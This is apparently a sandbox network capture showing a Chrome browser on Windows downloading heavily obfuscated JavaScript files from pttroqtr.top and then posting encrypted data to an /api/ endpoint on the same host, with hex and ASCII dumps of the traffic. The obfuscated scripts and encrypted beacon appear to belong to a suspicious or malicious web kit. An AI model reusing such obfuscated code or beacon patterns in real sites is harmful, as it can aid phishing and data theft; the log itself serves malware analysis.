                                                                                                                                                                                            2024-09-28 03:39:26 UTC16022INData Raw: 63 6f 6e 73 74 20 61 39 5f 30 78 31 33 64 30 32 33 3d 61 39 5f 30 78 33 36 34 37 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 63 30 66 34 63 2c 5f 30 78 35 62 34 66 37 65 29 7b 63 6f 6e 73 74 20 5f 30 78 31 38 63 30 65 33 3d 61 39 5f 30 78 33 36 34 37 2c 5f 30 78 33 35 64 30 39 63 3d 5f 30 78 31 63 30 66 34 63 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 61 38 30 38 39 35 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 38 63 30 65 33 28 30 78 66 62 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 31 38 63 30 65 33 28 30 78 31 32 65 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 38 63 30 65 33 28 30 78 31 39 63 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 38 63 30 65 33 28 30
                                                                                                                                                                                            Data Ascii: const a9_0x13d023=a9_0x3647;(function(_0x1c0f4c,_0x5b4f7e){const _0x18c0e3=a9_0x3647,_0x35d09c=_0x1c0f4c();while(!![]){try{const _0xa80895=-parseInt(_0x18c0e3(0xfb))/0x1*(parseInt(_0x18c0e3(0x12e))/0x2)+parseInt(_0x18c0e3(0x19c))/0x3+-parseInt(_0x18c0e3(0
                                                                                                                                                                                            2024-09-28 03:39:26 UTC16384INData Raw: 32 39 30 31 61 63 2c 27 70 61 72 73 65 27 3a 5f 30 78 35 33 38 35 38 36 2c 27 73 74 72 69 6e 67 69 66 79 27 3a 5f 30 78 33 30 39 36 33 33 7d 3b 7d 66 75 6e 63 74 69 6f 6e 20 50 74 28 5f 30 78 34 30 35 65 32 31 2c 5f 30 78 32 61 31 33 34 61 29 7b 63 6f 6e 73 74 20 5f 30 78 35 63 65 31 34 31 3d 61 39 5f 30 78 31 33 64 30 32 33 3b 6c 65 74 20 5f 30 78 35 65 35 37 31 62 3d 30 78 30 3b 66 6f 72 28 3b 5f 30 78 35 65 35 37 31 62 3c 5f 30 78 34 30 35 65 32 31 5b 5f 30 78 35 63 65 31 34 31 28 30 78 31 33 30 29 5d 26 26 5f 30 78 35 65 35 37 31 62 3c 5f 30 78 32 61 31 33 34 61 5b 5f 30 78 35 63 65 31 34 31 28 30 78 31 33 30 29 5d 3b 29 7b 63 6f 6e 73 74 20 5f 30 78 35 61 61 35 39 35 3d 5f 30 78 32 61 31 33 34 61 5b 5f 30 78 35 65 35 37 31 62 5d 2d 5f 30 78 34 30 35
                                                                                                                                                                                            Data Ascii: 2901ac,'parse':_0x538586,'stringify':_0x309633};}function Pt(_0x405e21,_0x2a134a){const _0x5ce141=a9_0x13d023;let _0x5e571b=0x0;for(;_0x5e571b<_0x405e21[_0x5ce141(0x130)]&&_0x5e571b<_0x2a134a[_0x5ce141(0x130)];){const _0x5aa595=_0x2a134a[_0x5e571b]-_0x405
                                                                                                                                                                                            2024-09-28 03:39:26 UTC16384INData Raw: 30 78 31 30 33 29 7c 7c 5f 30 78 39 38 62 34 63 33 28 30 78 31 32 61 29 2b 27 65 27 69 6e 20 5f 30 78 33 66 39 37 38 38 7c 7c 27 70 72 6f 70 73 27 69 6e 20 5f 30 78 33 66 39 37 38 38 7c 7c 5f 30 78 39 38 62 34 63 33 28 30 78 31 36 36 29 69 6e 20 5f 30 78 33 66 39 37 38 38 3b 7d 66 75 6e 63 74 69 6f 6e 20 4e 65 28 5f 30 78 33 63 61 34 37 36 29 7b 63 6f 6e 73 74 20 5f 30 78 32 62 36 33 33 33 3d 61 39 5f 30 78 31 33 64 30 32 33 2c 5f 30 78 31 61 66 61 33 64 3d 61 39 5f 30 78 33 65 36 30 61 34 28 65 65 29 2c 5f 30 78 32 38 35 39 35 32 3d 61 39 5f 30 78 33 65 36 30 61 34 28 67 65 29 2c 5f 30 78 31 39 35 63 34 33 3d 61 39 5f 30 78 32 65 65 33 64 31 28 28 29 3d 3e 5f 30 78 31 61 66 61 33 64 5b 27 72 65 73 6f 6c 76 65 27 5d 28 61 39 5f 30 78 31 66 33 62 30 36 28
                                                                                                                                                                                            Data Ascii: 0x103)||_0x98b4c3(0x12a)+'e'in _0x3f9788||'props'in _0x3f9788||_0x98b4c3(0x166)in _0x3f9788;}function Ne(_0x3ca476){const _0x2b6333=a9_0x13d023,_0x1afa3d=a9_0x3e60a4(ee),_0x285952=a9_0x3e60a4(ge),_0x195c43=a9_0x2ee3d1(()=>_0x1afa3d['resolve'](a9_0x1f3b06(
                                                                                                                                                                                            2024-09-28 03:39:26 UTC4314INData Raw: 32 31 32 63 5b 27 67 6f 27 5d 28 2d 5f 30 78 35 64 64 64 38 35 5b 27 64 65 6c 74 61 27 5d 2c 21 30 78 31 29 3a 5f 30 78 35 64 64 64 38 35 5b 5f 30 78 34 33 35 32 65 66 28 30 78 31 61 30 29 5d 3d 3d 3d 59 5b 5f 30 78 34 33 35 32 65 66 28 30 78 31 37 66 29 5d 26 26 49 28 5f 30 78 32 35 37 36 38 31 2c 30 78 31 34 29 26 26 5f 30 78 32 33 32 31 32 63 5b 27 67 6f 27 5d 28 2d 30 78 31 2c 21 30 78 31 29 29 2c 5f 30 78 31 64 63 61 62 30 28 5f 30 78 35 38 30 32 62 64 2c 5f 30 78 64 32 64 36 65 33 2c 5f 30 78 32 35 37 36 38 31 29 3b 7d 29 5b 5f 30 78 31 62 65 62 61 62 28 30 78 31 61 35 29 5d 28 57 29 3b 7d 29 29 3b 7d 6c 65 74 20 5f 30 78 33 30 31 63 32 31 3d 51 28 29 2c 5f 30 78 33 31 66 34 37 61 3d 51 28 29 2c 5f 30 78 37 34 33 34 30 32 3b 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                            Data Ascii: 212c['go'](-_0x5ddd85['delta'],!0x1):_0x5ddd85[_0x4352ef(0x1a0)]===Y[_0x4352ef(0x17f)]&&I(_0x257681,0x14)&&_0x23212c['go'](-0x1,!0x1)),_0x1dcab0(_0x5802bd,_0xd2d6e3,_0x257681);})[_0x1bebab(0x1a5)](W);}));}let _0x301c21=Q(),_0x31f47a=Q(),_0x743402;function


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            19192.168.2.5497358.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:26 UTC532OUTGET /help/assets/c27b6911JxKnW.js HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:27 UTC360INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:26 GMT
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Content-Length: 1892
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:44 GMT
                                                                                                                                                                                            ETag: W/"764-18fc3d84e20"
                                                                                                                                                                                            2024-09-28 03:39:27 UTC1892INData Raw: 66 75 6e 63 74 69 6f 6e 20 61 32 34 5f 30 78 35 33 34 36 28 5f 30 78 34 30 33 30 63 35 2c 5f 30 78 33 31 65 65 63 64 29 7b 63 6f 6e 73 74 20 5f 30 78 35 35 36 38 32 35 3d 61 32 34 5f 30 78 33 32 34 62 28 29 3b 72 65 74 75 72 6e 20 61 32 34 5f 30 78 35 33 34 36 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 62 30 64 65 37 2c 5f 30 78 63 65 30 63 62 32 29 7b 5f 30 78 33 62 30 64 65 37 3d 5f 30 78 33 62 30 64 65 37 2d 30 78 36 37 3b 6c 65 74 20 5f 30 78 33 32 34 62 64 62 3d 5f 30 78 35 35 36 38 32 35 5b 5f 30 78 33 62 30 64 65 37 5d 3b 72 65 74 75 72 6e 20 5f 30 78 33 32 34 62 64 62 3b 7d 2c 61 32 34 5f 30 78 35 33 34 36 28 5f 30 78 34 30 33 30 63 35 2c 5f 30 78 33 31 65 65 63 64 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 61 32 34 5f 30 78 33 32 34 62 28 29 7b 63 6f 6e
                                                                                                                                                                                            Data Ascii: function a24_0x5346(_0x4030c5,_0x31eecd){const _0x556825=a24_0x324b();return a24_0x5346=function(_0x3b0de7,_0xce0cb2){_0x3b0de7=_0x3b0de7-0x67;let _0x324bdb=_0x556825[_0x3b0de7];return _0x324bdb;},a24_0x5346(_0x4030c5,_0x31eecd);}function a24_0x324b(){con


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            20192.168.2.5497368.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:26 UTC532OUTGET /help/assets/cbcdcea5JxKnW.js HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:27 UTC361INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:26 GMT
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Content-Length: 6098
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:44 GMT
                                                                                                                                                                                            ETag: W/"17d2-18fc3d84e20"
                                                                                                                                                                                            2024-09-28 03:39:27 UTC6098INData Raw: 63 6f 6e 73 74 20 61 32 36 5f 30 78 32 66 36 62 32 65 3d 61 32 36 5f 30 78 32 31 39 35 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 62 32 36 64 35 2c 5f 30 78 35 38 66 37 30 33 29 7b 63 6f 6e 73 74 20 5f 30 78 35 35 62 61 30 32 3d 61 32 36 5f 30 78 32 31 39 35 2c 5f 30 78 35 36 65 64 31 35 3d 5f 30 78 34 62 32 36 64 35 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 31 63 32 66 33 33 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 62 61 30 32 28 30 78 31 36 33 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 62 61 30 32 28 30 78 31 39 61 29 29 2f 30 78 32 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 62 61 30 32 28 30 78 31 36 30 29 29 2f 30 78 33 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 62 61
                                                                                                                                                                                            Data Ascii: const a26_0x2f6b2e=a26_0x2195;(function(_0x4b26d5,_0x58f703){const _0x55ba02=a26_0x2195,_0x56ed15=_0x4b26d5();while(!![]){try{const _0x1c2f33=-parseInt(_0x55ba02(0x163))/0x1+-parseInt(_0x55ba02(0x19a))/0x2*(parseInt(_0x55ba02(0x160))/0x3)+parseInt(_0x55ba


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            21192.168.2.5497378.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:26 UTC364OUTGET /help/assets/09bf01f8JxKnW.js HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:27 UTC360INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:27 GMT
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Content-Length: 1965
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:42 GMT
                                                                                                                                                                                            ETag: W/"7ad-18fc3d84650"
                                                                                                                                                                                            2024-09-28 03:39:27 UTC1965INData Raw: 66 75 6e 63 74 69 6f 6e 20 61 30 5f 30 78 31 37 32 36 28 29 7b 63 6f 6e 73 74 20 5f 30 78 35 39 30 66 62 36 3d 5b 27 74 6f 53 74 72 69 6e 67 27 2c 27 61 70 70 6c 79 27 2c 27 31 32 31 37 32 38 30 6d 46 59 53 68 67 27 2c 27 37 34 35 31 30 31 48 74 47 52 79 7a 27 2c 27 35 6b 47 7a 6a 5a 66 27 2c 27 28 28 28 2e 2b 29 2b 29 2b 29 27 2c 27 73 65 61 72 63 68 27 2c 27 32 31 34 34 31 33 33 57 78 78 57 57 65 27 2c 27 72 65 6d 6f 76 65 27 2c 27 31 33 36 38 38 31 32 57 71 49 75 52 76 27 2c 27 6e 6f 6f 70 65 6e 65 72 27 2c 27 63 6c 69 63 6b 27 2c 27 32 32 32 36 35 37 34 56 6a 6b 4e 68 68 27 2c 27 34 34 39 33 36 38 6a 7a 6a 62 71 74 27 2c 27 34 32 35 36 39 37 36 4d 69 68 75 43 76 27 2c 27 61 70 70 65 6e 64 27 2c 27 62 6f 64 79 27 2c 27 72 65 6c 27 2c 27 63 6f 6e 73 74
                                                                                                                                                                                            Data Ascii: function a0_0x1726(){const _0x590fb6=['toString','apply','1217280mFYShg','745101HtGRyz','5kGzjZf','(((.+)+)+)','search','2144133WxxWWe','remove','1368812WqIuRv','noopener','click','2226574VjkNhh','449368jzjbqt','4256976MihuCv','append','body','rel','const


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            22192.168.2.5497388.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:26 UTC364OUTGET /help/assets/ec21517bJxKnW.js HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:27 UTC360INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:27 GMT
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Content-Length: 2711
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:44 GMT
                                                                                                                                                                                            ETag: W/"a97-18fc3d84e20"
                                                                                                                                                                                            2024-09-28 03:39:27 UTC2711INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 64 38 37 64 62 2c 5f 30 78 34 62 35 65 34 37 29 7b 63 6f 6e 73 74 20 5f 30 78 66 65 62 32 31 65 3d 61 33 31 5f 30 78 33 35 35 65 2c 5f 30 78 34 31 64 34 65 34 3d 5f 30 78 33 64 38 37 64 62 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 66 34 63 35 34 33 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62 32 31 65 28 30 78 31 32 36 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62 32 31 65 28 30 78 31 32 64 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62 32 31 65 28 30 78 31 32 62 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62 32 31 65 28 30 78 31 32 63 29 29 2f 30 78 34 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62
                                                                                                                                                                                            Data Ascii: (function(_0x3d87db,_0x4b5e47){const _0xfeb21e=a31_0x355e,_0x41d4e4=_0x3d87db();while(!![]){try{const _0xf4c543=parseInt(_0xfeb21e(0x126))/0x1*(parseInt(_0xfeb21e(0x12d))/0x2)+parseInt(_0xfeb21e(0x12b))/0x3+-parseInt(_0xfeb21e(0x12c))/0x4+-parseInt(_0xfeb


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            23192.168.2.5497398.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:27 UTC364OUTGET /help/assets/c16a2af0JxKnW.js HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:27 UTC362INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:27 GMT
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Content-Length: 35443
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:44 GMT
                                                                                                                                                                                            ETag: W/"8a73-18fc3d84e20"
                                                                                                                                                                                            2024-09-28 03:39:27 UTC16022INData Raw: 76 61 72 20 61 32 33 5f 30 78 32 32 30 38 61 35 3d 61 32 33 5f 30 78 31 62 39 34 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 37 31 61 32 32 2c 5f 30 78 32 39 64 61 64 62 29 7b 76 61 72 20 5f 30 78 31 33 65 38 38 35 3d 61 32 33 5f 30 78 31 62 39 34 2c 5f 30 78 31 33 62 65 61 38 3d 5f 30 78 31 37 31 61 32 32 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 34 63 63 35 36 38 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 33 65 38 38 35 28 30 78 32 63 35 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 31 33 65 38 38 35 28 30 78 31 65 38 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 33 65 38 38 35 28 30 78 31 66 62 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 33 65 38 38 35 28 30 78 32
                                                                                                                                                                                            Data Ascii: var a23_0x2208a5=a23_0x1b94;(function(_0x171a22,_0x29dadb){var _0x13e885=a23_0x1b94,_0x13bea8=_0x171a22();while(!![]){try{var _0x4cc568=parseInt(_0x13e885(0x2c5))/0x1*(parseInt(_0x13e885(0x1e8))/0x2)+parseInt(_0x13e885(0x1fb))/0x3*(-parseInt(_0x13e885(0x2
                                                                                                                                                                                            2024-09-28 03:39:27 UTC16384INData Raw: 61 63 62 28 30 78 31 62 65 29 5d 3d 3d 5f 30 78 34 66 36 61 63 62 28 30 78 32 61 31 29 2b 5f 30 78 34 66 36 61 63 62 28 30 78 32 39 33 29 2c 27 27 2b 5f 30 78 33 65 65 36 32 30 5b 5f 30 78 34 66 36 61 63 62 28 30 78 32 35 37 29 5d 3d 3d 5f 30 78 34 66 36 61 63 62 28 30 78 32 37 61 29 2b 5f 30 78 34 66 36 61 63 62 28 30 78 32 65 35 29 5d 29 3e 3d 30 78 33 3b 7d 66 75 6e 63 74 69 6f 6e 20 52 28 5f 30 78 33 61 31 62 63 65 29 7b 76 61 72 20 5f 30 78 32 30 34 38 39 39 3d 61 32 33 5f 30 78 32 32 30 38 61 35 2c 5f 30 78 33 30 62 65 35 36 3d 5f 30 78 33 61 31 62 63 65 5b 5f 30 78 32 30 34 38 39 39 28 30 78 32 66 35 29 5d 3b 69 66 28 5f 30 78 33 30 62 65 35 36 5b 5f 30 78 32 30 34 38 39 39 28 30 78 32 66 31 29 5d 3d 3d 3d 30 78 30 29 7b 76 61 72 20 5f 30 78 32 32
                                                                                                                                                                                            Data Ascii: acb(0x1be)]==_0x4f6acb(0x2a1)+_0x4f6acb(0x293),''+_0x3ee620[_0x4f6acb(0x257)]==_0x4f6acb(0x27a)+_0x4f6acb(0x2e5)])>=0x3;}function R(_0x3a1bce){var _0x204899=a23_0x2208a5,_0x30be56=_0x3a1bce[_0x204899(0x2f5)];if(_0x30be56[_0x204899(0x2f1)]===0x0){var _0x22
                                                                                                                                                                                            2024-09-28 03:39:27 UTC3037INData Raw: 36 33 28 30 78 32 30 34 29 5d 29 7b 63 61 73 65 20 30 78 30 3a 5f 30 78 33 31 62 62 65 62 3d 5f 30 78 35 38 33 35 31 61 5b 5f 30 78 62 35 64 34 34 34 5d 2c 5f 30 78 32 30 61 38 38 65 5b 5f 30 78 31 63 38 37 36 33 28 30 78 32 30 34 29 5d 3d 30 78 31 3b 63 61 73 65 20 30 78 31 3a 72 65 74 75 72 6e 20 5f 30 78 32 30 61 38 38 65 5b 27 74 72 79 73 27 5d 5b 5f 30 78 31 63 38 37 36 33 28 30 78 32 61 32 29 5d 28 5b 30 78 31 2c 30 78 33 2c 2c 30 78 34 5d 29 2c 5f 30 78 35 31 63 30 31 34 3d 5f 30 78 32 62 33 64 36 37 2c 5f 30 78 34 31 30 33 62 62 3d 5f 30 78 62 35 64 34 34 34 2c 5f 30 78 31 66 65 31 30 38 3d 7b 7d 2c 5b 30 78 34 2c 5f 30 78 33 31 62 62 65 62 28 29 5d 3b 63 61 73 65 20 30 78 32 3a 72 65 74 75 72 6e 20 5f 30 78 35 31 63 30 31 34 5b 5f 30 78 34 31 30
                                                                                                                                                                                            Data Ascii: 63(0x204)]){case 0x0:_0x31bbeb=_0x58351a[_0xb5d444],_0x20a88e[_0x1c8763(0x204)]=0x1;case 0x1:return _0x20a88e['trys'][_0x1c8763(0x2a2)]([0x1,0x3,,0x4]),_0x51c014=_0x2b3d67,_0x4103bb=_0xb5d444,_0x1fe108={},[0x4,_0x31bbeb()];case 0x2:return _0x51c014[_0x410


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            24192.168.2.5497408.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:27 UTC618OUTPOST /api/MC45ODQ1NjY2NzE5MzU4MDAy HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Content-Length: 292
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Content-Type: text/encrypt
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:27 UTC292OUTData Raw: 55 32 46 73 64 47 56 6b 58 31 39 58 48 2b 56 55 6e 2f 71 39 30 6e 45 61 71 69 73 2b 42 71 47 38 72 34 65 61 63 51 2b 35 72 46 32 62 72 6f 56 72 32 46 65 55 47 54 36 59 73 48 42 51 48 71 50 4c 4a 6d 6b 55 4a 54 58 64 2b 35 2f 32 52 75 52 57 2f 47 37 38 47 71 4d 58 74 46 6f 4a 2b 6b 34 49 70 37 36 49 64 37 76 61 30 49 55 32 77 59 4d 6a 45 58 62 70 36 4c 55 50 4b 71 72 37 46 62 43 46 46 64 4b 2f 51 6d 47 69 66 35 30 54 44 44 4b 37 46 74 50 68 53 38 71 48 33 6d 45 53 6f 7a 6f 4b 78 4a 4a 39 67 4a 63 57 6f 6d 38 69 49 51 56 45 52 67 77 32 75 5a 41 46 4a 53 64 67 45 65 37 59 50 35 70 71 74 6a 6e 75 4e 31 75 4c 66 2b 6e 30 6b 35 68 37 4b 44 63 67 37 79 4c 61 73 39 6b 67 62 6c 37 38 75 44 4d 47 74 75 62 77 31 48 35 48 6f 78 2f 34 2b 63 68 4a 35 78 6d 6b 35 77 44
                                                                                                                                                                                            Data Ascii: U2FsdGVkX19XH+VUn/q90nEaqis+BqG8r4eacQ+5rF2broVr2FeUGT6YsHBQHqPLJmkUJTXd+5/2RuRW/G78GqMXtFoJ+k4Ip76Id7va0IU2wYMjEXbp6LUPKqr7FbCFFdK/QmGif50TDDK7FtPhS8qH3mESozoKxJJ9gJcWom8iIQVERgw2uZAFJSdgEe7YP5pqtjnuN1uLf+n0k5h7KDcg7yLas9kgbl78uDMGtubw1H5Hox/4+chJ5xmk5wD
                                                                                                                                                                                            2024-09-28 03:39:27 UTC264INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:27 GMT
                                                                                                                                                                                            Content-Type: application/json; charset=utf-8
